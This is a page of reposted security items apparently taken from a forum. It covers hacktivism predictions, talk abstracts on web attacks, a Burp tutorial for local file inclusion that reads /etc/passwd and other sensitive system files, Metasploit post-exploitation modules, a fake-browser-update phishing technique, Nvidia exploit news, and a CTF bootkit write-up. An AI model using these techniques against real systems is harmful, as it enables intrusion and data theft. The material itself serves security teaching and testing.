Nytro

[h=1]Analysts: Anonymous to decline in 2013[/h]By Brett Winterford on Dec 28, 2012 9:54 AM (14 hours ago) [h=2]Security vendor finds hacking group predictable.[/h] Senior security researchers at Intel-owned security vendor McAfee have dubbed 2013 the year the Anonymous hacking collective will face stagnation and decline. Anonymous, a ‘loosely connected’ hacktivist movement that sprung up from 4Chan in 2003, has for a decade directed cyber-attacks at targets as varied as News Corp, The US, UK and Australian Governments, suspected pedophilia rings, the Church of Scientology and various rights holder groups such as record and film companies. Such was Anonymous’ momentum and impact that Time Magazine named the collective the ‘Person of the Year’ in 2012. But McAfee analysts, releasing their 2013 predictions, have gauged that Anonymous’ techniques are now well understood and predicted its influence will decline. “Sympathisers of Anonymous are suffering,” the analysts wrote. “Too many uncoordinated and unclear operations have been detrimental to its reputation.” “Anonymous’ level of technical sophistication has stagnated,” McAfee said, referring to the group's reliance on Distributed Denial of Service attacks, “and its tactics are better understood by its potential victims.” The analysts said Anonymous may draw new support from alliances with anti-globalisation groups such as splinters of the Occupy Wall Street movement. The future for hacktivism, the analysts said, is in the hands of individuals and groups prepared to be named when hacking for a cause they feel are just. McAfee analyst Francois Paget has argued for over 12 months that this strategy will prevail so long as Anonymous hackers are willing to out each other. A larger concern, the analysts said, is the growing numbers and sophistication of groups of “patriot” hackers attacking institutions that do not subscribe to their political world view – not to mention the sanctioned cyber-armies of nation states. Among McAfee’s other predictions: Rapid development of ways to attack Windows 8 and HTML5. The rise of mobile worms that buy malicious apps and steal via tap-and-pay NFC. Large-scale attacks like Stuxnet that attempt to destroy infrastructure. SMS spam from infected phones. “Hacking as a Service” and the rise of mobile phone ransomware “kits”. Nation states and armies will be more frequent sources and victims of cyberthreats. Sursa: Analysts: Anonymous to decline in 2013 - Security - Technology - News - iTnews.com.au

THC-IPv6 Attack Tool 2.1 Authored by van Hauser, thc | Site thc.org THC-IPv6 is a toolkit that attacks the inherent protocol weaknesses of IPv6 and ICMP6 and it includes an easy to use packet factory library. Changes: 4 new tools, features, and bug fixes Download: http://packetstormsecurity.org/files/download/119116/thc-ipv6-2.1.tar.gz Sursa: THC-IPv6 Attack Tool 2.1 ? Packet Storm

E clar

Eu am doar o curiozitate. Cum adica "eth0"? Ce inseamna interfata Ethernet "eth0" in terminologia voastra?

Beef Fake Browser Update Exploitation Description: In this video I will show you how to use BeEF Framework for fake browser update exploitation. Fake Browser Update : - In BeEF Framework there is a new feature available in social-engineering called Clippy using this feature we are sending the fake Update notification and if user click on that so obviously he is going to install that exe and other side you will get the meterpreter session. Very easy to perform but very good for social-engineering. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. BeEF : - BeEF - The Browser Exploitation Framework Project PDF : - BeEF Fake Browser Update Exploitation.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef Fake Browser Update Exploitation

Linux Post - Exploitation Using Metasploit Framework Description: In this video I will show you how to perform post exploitation on a Linux system using Metasploit Framework. So, In Metasploit there is 9-10 modules available for Linux post exploitation all modules are working very well. I thing this modules are best for Post – Exploitation on Linux very easy to use and effective. Modules are used .. Linux Gather Dump Password Hashes for Linux Systems | Metasploit Exploit Database (DB) Post Module to dump the password hashes for all users on a Linux System Linux Gather Virtual Environment Detection | Metasploit Exploit Database (DB) This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM. Linux Gather Configurations | Metasploit Exploit Database (DB) This module collects configuration files found on commonly installed applications and services, such as Apache, MySQL, Samba, Sendmail, etc. If a config file is found in its default path, the module will assume that is the file we want. Linux Gather Network Information | Metasploit Exploit Database (DB) This module gathers network information from the target system IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information. Linux Gather Protection Enumeration | Metasploit Exploit Database (DB) This module tries to find certain installed applications that can be used to prevent, or detect our attacks, which is done by locating certain binary locations, and see if they are indeed executables. For example, if we are able to run 'snort' as a command, we assume it's one of the files we are looking for. This module is meant to cover various antivirus, rootkits, IDS/IPS, firewalls, and other software. Linux Gather System and User Information | Metasploit Exploit Database (DB) This module gathers system information. We collect installed packages, installed services, mount information, user list, user bash history and cron jobs Linux Gather User History | Metasploit Exploit Database (DB) This module gathers user specific information. User list, bash history, mysql history, vim history, lastlog and sudoers. Source : - Penetration Testing Software | Metasploit PDF : - Linux Post Exploitation.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Tags: post-exploitation , hacking , hack , Sursa: Linux Post - Exploitation Using Metasploit Framework

Web Framework Vulnerabilties Description: Abstract This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is trimmed down version of the 3 hour workshop given at Blackhat. This is an advanced talk and an understand of the application frameworks is a prerequisite to get the most out of this talk. ***** Speaker: Abraham Kang, Principal Security Researcher, HP Fortify Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked with application security for over 10 years with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Web Framework Vulnerabilties - Abraham Kang on Vimeo Sursa: Web Framework Vulnerabilties

Hacking With Web Sockets Description: Abstract HTML5 isn't just for watching videos on your iPad. Its features may be the target of a security attack as much as they may be used to improve an attack. Vulnerabilities like XSS have been around since the web's beginning, but exploiting them has become increasingly sophisticated. HTML5 features like WebSockets are part of the framework for controlling browsers compromised by XSS. This presentation provides an overview of WebSockets: How they might increase the attack surface of a web site, their implications for privacy, and the potential security problems with protocols tunneled over them. Then it demonstrates how WebSockets can be used as an effective part of a hacking framework. It closes with recommendations for deploying WebSockets securely, applying security principles to web app design, and providing a tool for exploring WebSockets security. ***** Speaker: Vaagn Toukharian - Senior Software Engineer, Qualys Senior Software Engineer for Qualys's Web Application Scanner. | Was involved with security industry since 1999. | Experience includes work on Certification Authority systems, encryption devices, large CAD systems, Web scanners. | Outside of work interests include IronMan triathlons and photography. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Hacking with Web Sockets - Vaagn Toukharian on Vimeo Sursa: Hacking With Web Sockets

Cross Site Port Scanning Description: Abstract Several web applications provide functionality to pull data from other Internet facing Web Applications for either internal use or to verify application availability. We see this in the form of applications pulling images using user specified URLs, applications showing server status for user specified URLs, applications pulling feeds, XML and manifest files etc. An attacker can abuse this functionality to send crafted queries to a remote web server using the application that provides this functionality. The responses can be studied and in the case of unique responses, can be abused to do a blind port scan on any Internet facing device or even on internal local networks and the same server/host. In this paper we will see how this commonly available functionality in most web applications can be abused by attackers to port scan other servers, or perform a Cross Site Port Scan (XSPS). I found this issue with Facebook, where I was able to port scan any Internet facing server using Facebook’s IP addresses. Consecutively, I was able to identify this issue in several other prominent Web Applications on the Internet, including Google, Apigee, StatMyWeb, Mozilla.org, Face.com, Pinterest, Yahoo, Adobe and several others. We will take a look at the vulnerabilities that were present in the above mentioned web applications that allowed me to abuse the functionality to perform port scans on remote servers using predefined functionality. An attacker can abuse this by specifying URLs in the form of servername: to the application and review the response obtained. I have seen three unique responses based on port and service. The following are the different errors/response messages obtained: 1. For an open port running an HTTP service, the error/server response is specific to the call. An attacker may see HTML content or a function specific message like “Image not found” or “Invalid data stream” 2. For an open port running a service other than HTTP (like SSH, TELNET, SMTP or RDP), the error/server response is mostly generic like “Invalid data stream”, “Expected content-type was invalid” or “Received HTTP error code -1 while fetching source feed” 3. For a closed port, the errors/server responses are often descriptive like “HTTP/1.1 503 Service Unavailable”, “[Errno 101] Network is unreachable” or “DOWNLOAD_ERROR_CONNECTION_REFUSED” etc. Based on these error messages, which are unique for every server tested, we can conclusively identify closed and open ports on remote servers. Even better in some cases, the application displays the actual responses received in raw format allowing us to use it for banner grabbing. Cross Site Port Scanning is a technique that allows an attacker to abuse perfectly common functionality, like fetching a file or data from a remote server, to perform blind port scans on Internet facing servers. An application which accepts user input as a URL, fetches content from the user supplied URL and displays non-generic errors, is vulnerable to XSPS. An attacker can also enumerate ports on the server that makes the HTTP request on behalf of the user by providing a localhost as the URL with a port parameter. Simply put, an application that accepts a URL like site/images/derp.jpg fetches the content on the server side and displays the image, is vulnerable, if it displays port status or connection specific errors when a user requests the following URLs: site:22/images/nonexistentimage.jpg site:23/images/nonexistentimage.jpg site:3128/images/nonexistentimage.jpg site:3389/images/nonexistentimage.jpg An attacker would then be able to analyze the error messages and identify open and closed ports based on unique error responses. These responses may be raw socket errors (like “Connection refused” or timeouts) or may be customized by the application (like “Unexpected header found” or “Service was not reachable”) ***** Speaker: Riyaz Walikar I am a Web Application Security Engineer / Pentester / Network Security Architect for food, shelter, fun and passion. I have had luck with finding vulnerabilities with popular web applications like Facebook, Twitter, Google, Cisco, Symantec, Mozilla, PayPal, Ebay, Apigee etc. for which I am on the Hall of Fame for most of these services. You can follow me on twitter @riyazwalikar My interests lie with vulnerability research, breaking web applications, playing CTFs, finding new ways into computer networks, playing football and fishing.. riyazwalikar.com Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Cross Site Port Scanning - Riyaz Walikar on Vimeo Sursa: Cross Site Port Scanning

Xss And Csrf With Html5 - Attack, Exploit And Defense Description: Abstract HTML5 has empowered browser with a number of new features and functionalities. Browsers with this new architecture include features like XMLHttpRequest Object (L2), Local Storage, File System APIs, WebSQL, WebSocket, File APIs and many more. The browser is emerging as a platform like a little operating system and expanded its attack surface significantly. Applications developed in this new architecture are exposed to an interesting set of vulnerabilities and exploits. Both traditional vulnerabilities like CSRF and XSS can be exploited in this new HTML5 architecture. In this talk we will cover following new attack vectors and variants of XSS and CSRF. HTML5 driven CSRF with XMLHttpRequest (Level 2) CSRF with two way attack stream Cross Site Response Extraction attacks using CSRF Cross Origing Resource Sharing (CORS) policy hacking and CSRF injections DOM based XSS with HTML5 applications Exploiting HTML5 tags, attributes and events DOM variable extraction with XSS Exploiting Storage, File System and WebSQL with HTML5 XSS Layered XSS and making it sticky with HTML5 based iframe sandbox Jacking with HTML5 tags and features In this session we will cover new methodology and tools along with some real life cases and demonstration. At the end we will cover some interesting defense methodologies to secure your HTML5 applications. ***** Speaker: Shreeraj Shah Shreeraj Shah, B.E., MSCS, MBA, is the founder of Blueinfy and iAppSecure Solution. Prior to founding Blueinfy, he was founder and board member at Net Square. He also worked with Foundstone (McAfee), Chase Manhattan Bank and IBM in security space. He is also the author of popular books like Web 2.0 Security, Hacking Web Services and Web Hacking: Attacks and Defense. In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, ISACA etc. His articles are regularly published on Securityfocus, InformIT, DevX, O’reilly and HNS. His work has been quoted on BBC, Dark Reading, Bank Technology, MIT Technology Review, SecurityWeek as an expert in the area of HTML5, Web 2.0 and Browser technologies and security. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: XSS & CSRF with HTML5 - Attack, Exploit and Defense - Shreeraj Shah on Vimeo Sursa: Xss And Csrf With Html5 - Attack, Exploit And Defense

[h=2]Local File Inclusion Exploitation With Burp[/h] Local file inclusion is a vulnerability that allows the attacker to read files that are stored locally through the web application.This happens because the code of the application does not properly sanitize the include() function.So if an application is vulnerable to LFI this means that an attacker can harvest information about the web server.Below you can see an example of PHP code that is vulnerable to LFI. Vulnerable Code to LFI In this article we will use the mutillidae as the target application in order to exploit the local file inclusion flaw through Burp Suite.As we can see and from the next screenshot the user can select the file name and he can view the contents of this just by pressing the view file button. Location of LFI on the Web Application So what we will do is that we will try to capture and manipulate the HTTP request with Burp in order to read system files. Capturing the HTTP Request As we can see from the above request,the web application is reading the files through the textfile variable.So we will try to modify that in order to read a system directory like /etc/passwd.In order to achieve that we have to go out of the web directory by using directory traversal. HTTP Request Modification – /etc/passwd We will forward the request and now we can check the response on the web application as the next image is showing: Reading the /etc/passwd We have successfully read the contents of the /etc/passwd file.Now with the same process we can dump and other system files.Some of the paths that we might want to try are the following: /etc/group /etc/hosts /etc/motd /etc/issue /etc/mysql/my.cnf /proc/self/environ /proc/version /proc/cmdline /etc/group contents etc/hosts contents motd /etc/issue contents mysql configuration file /proc/self/environ /proc/version contents /proc/cmdline contents Conclusion As we saw the exploitation of this vulnerability doesn’t require any particular skill but just knowledge of well-known directories for different platforms.An attacker can discover a large amount of information for his target through LFI just by reading files.It is an old vulnerability which cannot be seen very often in modern web applications. Sursa: https://pentestlab.wordpress.com/2012/12/26/local-file-inclusion-exploitation-with-burp/

NSA 'Perfect Citizen' Program Documents Released, Report By Brian Prince on December 27, 2012 A National Security Agency (NSA) program designed to discover security vulnerabilities at critical infrastructure companies is in full swing, according to documents reportedly obtained by the Electronic Privacy Information Center (EPIC). The program, dubbed 'Perfect Citizen', was unmasked in 2010 in a report by the Wall Street Journal that claimed it involved sensors that monitored networks at critical infrastructure companies. At the time however, the NSA stated publicly the program did not involve "the monitoring of communications or the placement of sensors on utility company systems," and that the project provided a set of technical solutions to help the NSA understand "threats to national security networks." According to CNET, using a Freedom of Information Act (FOIA) request, EPIC obtained 190 pages of files on Perfect Citizen, at least 98 of which were completely deleted for security reasons. The portions that were readable showed that defense company Raytheon received a $91 million contract to build Perfect Citizen and was authorized to hire up to 28 hardware and software engineers to analyze and document vulnerability research against control systems and devices. The program is slated to continue through at least 2014, according to CNET. Marc Rotenberg, executive director of EPIC, told CNET that the documents may help disprove the NSA's claims that Perfect Citizen doesn't involve monitoring private networks. This year has seen multiple reports of the U.S. expanding its efforts to defend cyberspace and develop offensive weapons, including reports about malware such as Stuxnet and Flame linking to secret operations involving the NSA and other agencies. The U.S. has not officially admitted to using cyberweapons in the wild. However, earlier this year, the Washington Post reported the Pentagon was accelerating plans to develop cyberweapons, and that the amount of spending disclosed by the Pentagon on cybersecurity initiatives and technology in 2012 was $3.4 billion. "If your defense is only to try to block attacks you can never be successful," General Keith Alexander, director of the National Security Agency and commander of the US Cyber Command, told a Washington symposium in October. Sursa: NSA 'Perfect Citizen' Program Documents Released, Report | SecurityWeek.Com

[h=1]Nvidia Display Driver Service Attack Escalates Privileges on Windows Machines[/h]by Michael Mimoso There’s nothing like a zero-day to ruin the holiday break, but that’s just what may be in store for engineers at Nvidia after a researcher discovered a new vulnerability in the Nvidia Display Driver Service. The flaw could hand over administrator privileges on Windows machines to an attacker. Peter Winter-Smith, formerly with the NGS Software of the U.K., posted details of the vulnerability and exploit to Pastebin. In it, he explains that the service is vulnerable to a stack buffer overflow that bypasses data execution prevention (DEP) and address space layout randomization (ASLR) running in the Windows operating system since Windows Vista. “The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability,” Winter-Smith wrote on Pastebin. “The buffer overflow occurs as a result of a bad memmove operation.” Winter-Smith told Threatpost the vulnerability is difficult to exploit because it mostly affects domain-based machine, and the machines in question would have to have relaxed firewall rules and need to be able to share files. “In the local scenario in which an attacker attempts to gain increased privileges on a machine they already have access to, it would be very easy,” Winter-Smith said. “It's not incredibly serious (compared to—say--a browser exploit). If it were going to put people at risk I'd not have released exploit code and I'd have informed the vendor and kept quiet until a fix were issued.” Winter-Smith said an attacker could exploit the vulnerability in two ways: with local access they could escalate privileges to root giving them full control over the machine; or remotely against machines on the same Windows domain if the user running Nvidia has enabled file sharing from their machine or has disabled their firewall, remote access can be gained. Memmove operations copy data from a source location to a memory destination. Winter-Smith said the service copies data unchecked; an attacker would be able to control the source location as well as the number of bytes copied into the response buffer; an attacker would be able to leak data from the stack by overflowing it. “The memmove function copies data from one place in memory to another, and the fact that it was not properly used allowed me to both copy data critical to bypassing the Windows protections,” Winter-Smith said, “by copying private data in memory within the Nvidia service process into the data buffer that would be sent back to me, and trigger the vulnerability (by overwriting memory sufficient to give me full control over what the Nvidia service would try to do once the processing of my messages had completed).” Nvidia, based in Santa Clara, Calif., builds graphics processing units for PCs, mobile and embedded devices, as well as other processing applications for high-performance computing systems. Nvidia competes with Intel, AMD and Qualcomm in these markets. The nvsvc32.exe service in question here runs automatically on any Windows machine running a Nvidia GPU. Winter-Smith said he wanted to share the exploit in a timely fashion, rather than report it. “I am definitely not averse to responsible disclosure and typically do follow a responsible disclosure process, however the risk from this particular flaw being exploited was (is) sufficiently low that I didn't think it would warrant the wait,” he said. Sursa: Nvidia Display Driver Service Attack Escalates Privileges on Windows Machines | threatpost

[h=1]The cyber attacks on Saudi Aramco, RasGas, and U.S. banks in the context of international law[/h]Dimitar Kostadinov December 26, 2012 Introduction When it was created, the Internet was launched as a classified military experiment, but nowadays it is a widely used tool that has a multitude of purposes. Recent cyber attacks on Saudi Arabia’s state oil company Saudi Aramco, the Qatari gas firm RasGas, and denial-of-service attacks on some major U.S. banks come as evidence that the battlefield is shifting from a three-dimensional to a linear front, and this tendency may also result in an overall drastic change of warfare standards. In spite of the obvious improvement of life standards which this technological revolution brought, the great dependency on computers may open a new page of warfare conduct. Because international law is hampered by constraints imposed before the advent of cyber attacks, one of the most significant challenges today is withstanding this rapid advance of computer technology. Jus ad bellum and cyber warfare. Interaction and specifics of “use of force” and “armed attack” terms The most essential jus ad bellum provisions are Article 2(4), the prohibition on the use of force, and article 51 of the UN Charter, the use of self-defense. These norms bind all states whether or not they are members of the United Nations. Although the UN Charter is drafted long before the emergence of the Internet and cyber attacks respectively, its provisions regulate any use of force. This fact is being affirmed by the International Court of Justice (ICJ): Article 2(4) and Article 51 are applicable to “any use of force, regardless of the weapons employed.”(ICJ, 1996) Among most scholars, there is no doubt that cyber attacks could qualify as a use of force pursuant to Article 2(4) and self-defense as in Article 51. Consequently, the UN Charter system, as well as the customary international law, regulates the conflicts in which the parties can use computer systems to inflict harm on each other (Robertson, 2002). In relation to the aforementioned provisions, there are two significant terms—”use of force” (Article 2(4)) and “armed attack” (Article 51)—which seem to have a certain correlation between them. A careful textual analysis ascertains that both terms have different purposes and scope. While the concept of “use of force” seems to be broader in meaning, the term “armed force” is directly related to severe cases to threats to the peace, breach of the peace, or acts of aggression (Schmitt, 1999). In the Nicaragua case (1985), the ICJ affirms that there is a difference between a “use of force” and an “armed attack”. The court adopts the view that an armed attack constitutes a higher degree as it bears direct infliction of death/injury on human beings or physical damage on property. This distinction made by the court does not tie the hands of states when it suffers an information operation that does not rise to the standard of ‘armed attack’. Simply, it means they should restrain their response short of military action (Schmitt, 2003). The distinction between an armed attack and the use of force is premeditated. The current U.N. scheme precludes responses, especially unilateral actions, to acts which do not rise to the level of an armed attack. The type and level of response to cyber attacks Similar to the terrorist acts, cyber attacks are initiated without warning and often, the result of the attack is noticeable within seconds after it has been launched, thus giving the victim almost no time to react. Usually, the level and type of response to the use of force is determined more or less by the extent of the impact of the initial strike. A cyber attack directed against a minor target that is not meant to cause grave consequences, such as death/injury or destruction/damage, would most probably not be viewed as an armed attack. Moreover, the state’s prerogative to respond to the use of force in self-defense is regulated by the necessity and proportionality tenets: Necessity The principle of necessity justifies a more decisive action when all peaceful means are exhausted and there are no further options to settle the conflict any other way than through the use of forceful methods. Proportionality The proportionality tenet regulates the quantity of the countermeasures used. They must be proportional and adequate to those used in the initial attack made by the aggressor. Not exactly clear is the situation when the uses of force do not reach the threshold of an armed attack. Both unilateral attack and collective self-defense are not allowed. Nonetheless, although reprisals infringe on the international law, acts like retorsion have become increasingly popular and often occur in cyber warfare. The attacks on Saudi Aramco, RasGas, and the US banks are thought to be retaliation strikes for the Stuxnet worm, which was allegedly devised by the joint efforts of US and Israeli specialists and designed to undermine Iran’s nuclear ambitions (Sale, 2012). International law prohibits such attacks, butone way to cope with this situation is to address the issue to the UN Security Council, with the hope of getting permission for a forceful response not related to armed attack under Article 39 of the Charter. Unilateral responses are restricted without authorization from the Security Council. When passive defensive measures prove themselves incapable of preventing an aggressive act, then the injured State has the right to retrieve reparations for the damages suffered. Of course, in accordance with the current international law, such a claim would only be possible if there is an actual agreement on cyber attacks between the states in question (Creekman, 2002). The current warfare legislation and Schmitt’s scheme The state practice concerning applying the jus ad bellum legal framework to cyber attacks, more specifically the use of force notion, is vague and ambiguous. Even though the current jus ad bellum and in bello do not regulate cyber attacks well, they can still serve as “a model for devising rules.” One way to adjust the notion of cyber attacks is to shape it with the help of the general principles and pre-existing legal frames for conventional armed attacks. Such an adjustment must stay by all means flexible and should not be performed in a merely prohibitive manner (Brown, 2006). As an alternative, Michael Schmitt, the Chairman of International Law Department at the United States Naval War College, proposes a scheme of factors that may prove useful when a person evaluates whether a cyber attack constitutes a use of force and/or resembles a conventional armed attack (Schmitt, 2011). These factors are: Severity This is the most important factor because it gives information about the negative consequences of a cyber attack. The Shamoon virus destroyed the hard drives of most of Aramco’s computers and erased the data on management servers which were of utmost importance for the company. U.S. Defense Secretary Leon Panetta claims that cyber attacks “could be as destructive as the terrorist attack of 9/11,” whether conducted by a state or non-state actors (Riley & Engleman, 2012). (2) Immediacy This criterion is also important because it indicates how soon the consequences emerge after the impact. If the results are evident soon after the attack, as is often the case with cyber attacks, the chance for a peaceful solution or other viable alternative decreases. Conversely, there are many concerns about computer methods like logic and time bombs whose real consequences appear with some delay (Schmitt, 2011). Shamoon’s code has an embedded timer that was set to attack at the exact time that Aramco’s computers were struck (Perlroth, 2012). (3) Directness This factor accentuates on the chain of causation of a cyber attack and assesses the line of events that would eventually lead from the act to the results (Schmitt, 1999). The Shamoon virus, as well as the Stuxnet worm, hit their targets causing direct negative consequences—data erasure or system malfunctions. (4) Invasiveness A factor related to the level of penetration in a secured system. The unauthorized armed attacks usually cross into another country’s border and they impair significantly the sovereignty of the victim state. Hence, the stability of the target state is threatened and the authority of the government and its institutions is undermined (Schmitt, 1999). The infected computers at Saudi Aramco weren’t connected to the Internet, and according to the officials involved in the investigation, the virus was distributed from a USB memory stick by an employee of the company (Sale, 2012). (5) Measurability This criterion identifies the consequences in terms of quantity. If the indicator shows that the number is too high, then the state’s interest is more likely to be impaired (Schmitt, 1999). In terms of numbers, the attack on Saudi Aramco wiped the data on 30, 000 computers, whereas the Stuxnet worm temporarily took 1,000 centrifuges at the Natanz nuclear plant out of order. (6) Presumptive Legitimacy Schmitt concludes that if an act is not prohibited, then it is permitted. The main reason is that international law tries to make the interpretation and implementation process simpler and also because it is prohibitive by nature (Schmitt, 2011). Erasing important information from the computers of a major oil company, sabotaging the functionality of a nuclear plant, and performing denial-of-service attacks on banks and financial institutions is however, by any means, illegitimate. (7) Responsibility An indicator which stands to show when a state is responsible for a cyber attack. The level of involvement of a state in a certain operation is the key here. If the state in question is deeply involved in a particular cyber attack, then this occurrence is more likely to be categorized as a use of force (Schmitt, 2011). Nevertheless, a cyber attack must be duly attributed first before a state is held responsible. The Attribution Requirement A very important issue is the attribution of the relevant actions to a state. The attribution of an attack to state agents is a condicio sine qua non under international law because of the potential misguidance of a counter strike towards an “innocent” computer system (Graham, 2010). When the attacker is a state actor, then the countermeasures must observe the jus ad bellum and jus in bello prescriptions pursuant to the UN Charter and customary international law (Condron, 2007). There is this predominant conviction in international jurisprudence that only states can be adversaries and are entitled to the right to use force in the sense of the UN Charter, and that non-state actors are excluded from the scope of Article 2(4) (Barkham, 2001). Non–state actors like individuals, organized groups, and terrorist organizations need to be linked to a state in order to bear responsibility under this article, otherwise their actions may violate the domestic law of the country which they belong to but not the prohibition on the use of force (Schmitt, 2003). Supposedly, most cyber attacks are conducted by individuals. The members of various terrorist organizations have gradually become more and more computer literate (Graham, 2010); for example, the minor hacker group “Cutting Sword of Justice,” which took the responsibility for the cyber attack on Aramco, consists only of about 100 participants. It is thought that this group is covertly sponsored by the Iranian government. However, the direct and affirmative attribution to another state may be a difficult task to deal with because of the inherent anonymity of these attacks. The forensic officials involved in the Aramco investigation are not certain that the incident was an Iranian act. On the other hand, the forensic conclusion could not prove with certainty that the cyber attack wasn’t executed by a non-state actor. The virus could have been simplified on purpose (Riley & Engleman, 2012). However, there is a general conviction that Iran is behind all of the recent cyber attacks. Conclusion The probability of grave cyber attacks imposes an obligation to policymakers to generally reconsider the manner in which they conduct the protection of computer networks and devices, especially those which are an underlying segment of a critical national infrastructure. Clearly, cyber attacks present an enormous challenge to the jus ad bellum norms because those norms were elaborated well before the emergence of the Internet. Taking into account the significant damage of the cyber attacks on Saudi Aramco, RasGas, the US banks, as well as the Stuxnet hit at Natanz, the international community must realize completely the fact that grave cyber attacks are not myth, but reality, and that more decisive measures regarding this threat and its existence within the jus ad bellum framework are needed. Reference List Barkham, J. (2001). Information warfare and international law on the use of force. N.Y.U.J. INT’L L. & POL 57, 34. Brown, D. (2006). A Proposal for an International Convention To Regulate the Use of Information Systems in Armed Conflict. Harvard: Harv. Int’l L.J. Condron, S. (2007). Getting it right: Protecting American critical infrastructure in cyber space. Harvard Law Review, 20, 403-422. Creekman, D. (2002). A helpless America? An examination of the legal options available to the United States in responding to varying types of cyber attacks. Am. U. Int’L L. Rev, 3, 641-681. Graham, D. (2010). Cyber threats and the law of war. Journal of National Security Law and Policy, 4, 87-104. International Court of Justice (1996). The legality of the threat or use of nuclear weapons. Retrieved from International Court of Justice International Court of Justice (1986). Military and Paramilitary Activities in and against Nicaragua (Nicaragua v. United States of America).Retrieved from International Court of Justice Perlroth, N. (2012). In Cyberattack on Saudi Firm, U.S. Sees Iran Firing Back. Retrieved from http://www.nytimes.com/2012/10/24/business/global/cyberattack-on-saudi-oil-firm-disquiets-us.html?pagewanted=all Riley M. & Engleman R. (2012). Code in Aramco Cyber Attack Indicates Lone Perpetrator. Retreived from Code in Aramco Cyber Attack Indicates Lone Perpetrator - Bloomberg Robertson, H. B. (2002). Self-Defense against computer network attack. I NT’L L. STUD, 76, 121-123. Sale, R. (2012). Saudi Insider Likely Key to Aramco Cyber-Attack. Retrieved from http://www.ipsnews.net/2012/10/saudi-insider-likely-key-to-aramco-cyber-attack/ Schmitt, M. (1999). Computer network attack and use of force in international law. Columbia Journal of Transnational Law, 37, 885-937. Schmitt, M., Harrison D., Heather A., & Winfield, T. (2004). Computers and war: The legal battlespace. Harvard Program on Humanitarian Policy and Conflict Research. Schmitt, M. (2011). Cyber operations and the jus ad bellum revisited. Villanova Law Review, 56, 569-606. Sursa: InfoSec Institute Resources – The cyber attacks on Saudi Aramco, RasGas, and U.S. banks in the context of international law

[h=3]PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)[/h]PHDays CTF Quals took place on December 15-17, 2012. More than 300 teams participated in this event and fought to become a part of PHDays III CTF, which is going to be held in May 2013. Our team had been developing the tasks for this competition for two months. And this article is devoted to the secrets of one of them – Binary 500. This task is very unusual and hard-to-solve, so nobody could find its flag. This executable file is an MBR bootkit, which uses hardware virtualization (Intel VT-x). Due to the program’s specific features, we decided to warn users that this program should be executed on a virtual machine or an emulator only. Warning and license agreement Dropper Let’s start with the dropper overview. The main goal of this module is very simple. It is to write files extracted from a resource section into a self-made hidden file system and replace original MBR with a self-made one. It also saves original MBR in the file system. There are few things, which complicate the dropper analysis. First of all, it is written in C++ using STL, OOP, and virtual functions. That’s why all the calls are indirect. Virtual function calls in IDA Pro Secondly, all the disk operations are carried out via the SCSI controller. Instead of the usual ReadFile/WriteFile functions, we use DeviceIoControl with the control code SCSI_PASS_THROUGH_DIRECT, which allows us to communicate with the hard drive on a lower level. All the files from the resources are encrypted using RC4 and a 256-bit key. The next thing is the hidden file system. Its structure is pretty simple. The system grows from the end and is written two sectors before the end of the hard drive. First DWORD is a number of files XORed with constant 0x8FC54ED2. Then a directory with information about the files goes: struct MiniFsFileEntry { DWORD fileIndex; DWORD fileOffset; DWORD fileSize; }; The file index is just a constant related to a specific file. Offset is counted in bytes relative to the file system start. MiniFs file system structure MBR After the dropper ends its operation, it becomes obvious that we have nothing left to do with the operating system and just need to reboot and start debugging the master boot record. There are several ways to debug MBR. There’s no doubt we can analyse it on a real machine using a hardware debugger, but it’s inconvenient and expensive. That is why we recommend to use the VMWare virtual machine (you need to configure an image configuration file at first) connecting to it with the help of the GDB debugger (this method has significant drawbacks, which will be described later) or the Bochs emulator. The main advantage of these methods is that you can use the IDA Pro debugger for analysis and it’s very convenient! Having chosen our instruments, we are able to get started. The first part of MBR is really simple, and there shouldn’t be any problems with its analysis. It only reads the second part of our MBR (Extended MBR) from the hard drive and writes it to the memory at address 0x7e00 (right after the first part). This operation is important because BIOS maps just the first 512 bytes of MBR and our code exceeds this size. Analyzing extended MBR, a good specialist will immediately understand that something is wrong, namely that the loader is obfuscated. Comparison of MBR source code with the IDA Pro analysis 